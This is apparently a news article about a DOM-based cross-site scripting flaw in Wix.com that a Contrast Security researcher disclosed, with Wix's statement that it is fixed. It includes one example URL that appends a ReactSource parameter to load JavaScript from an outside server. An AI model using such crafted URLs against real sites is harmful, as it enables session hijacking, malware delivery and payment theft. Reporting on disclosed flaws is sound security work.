Update Cloud-based web host Wix.com is vulnerable to a DOM-based cross-site scripting vulnerability that can give attackers control over any of the millions of websites hosted on the platform.
“Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website,” according to Matt Austin, senior security research engineer with Contrast Security.
Austin said Wednesday the vulnerability was still unpatched despite repeated attempts to warn and notify Wix.com since early October. On Thursday Wix.com representatives sent Threatpost a brief statement stating the problem has been solved.
“We take the security of our customers very seriously. After thorough examination we can state that the issue has been addressed. We do operate a formal bug bounty program and are taking steps to widen the community,” said Matt Rosenberg, Wix.com spokesperson. According to Wix.com’s own estimates, there are 86 million users of its platform.
Unlike traditional cross-site scripting exploits, where a payload is dropped onto a page in response to a HTTP(S) request, DOM-based XSS attacks modify the Document Object Model environment in the browser used by client-side script, and malicious code affects the execution of client-side code, according to OWASP.
Austin explained two reflective DOM-based XSS attack scenarios. One involved a Wix website owner who is lured into visiting a malicious URL loaded with a specially crafted JavaScript that can hijack the target’s browser session. The attacker could then assume the browser session of the authenticated victim, allowing the attacker to perform any actions as that user. This includes modifying a Wix website controlled by the victim, giving website admin rights to a third party or infiltrating an Wix ecommerce site to steal credit card numbers.
“Administrator control of a Wix.com site could be used to widely distribute malware, create a dynamic, distributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it,” Austin said.
In a second scenario, Austin describes a user being lured to a Wix website by a specially crafted URL. That URL could load JavaScript into the targeted Wix.com site via a DOM-based XSS attack. In one scenario a Wix.com-based fan site could be modified for a specific browser session to serve-up malware downloads instead of music downloads or reroute PayPal payments to a third-party account.
In examples of the DOM XSS attack, all an attacker needs to do is host malicious JavaScript on a server and point to it within a URL. For example: “http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”. In this example the root domain “http://matt4592.wixsite.com/music” is impacted by the appended “?ReactSource=http://m-austin.com” URL creating conditions for a reflected DOM-based XSS attack to deliver a payload.
Worse, Contrast Security said, using this flaw a cybercriminal could expand on the attack, turning it into a worm that spreads across all Wix sites, similar to the notorious 2005 Samy worm or MySpace worm – designed to propagate across the social-networking site.
“If the MySpace worm is any guide, taking over all the millions of websites hosted at Wix wouldn’t take very long,” Austin said.
This story has been updated Thursday 9:00 a.m. ET with a comment from Wix.com’s Matt Rosenberg.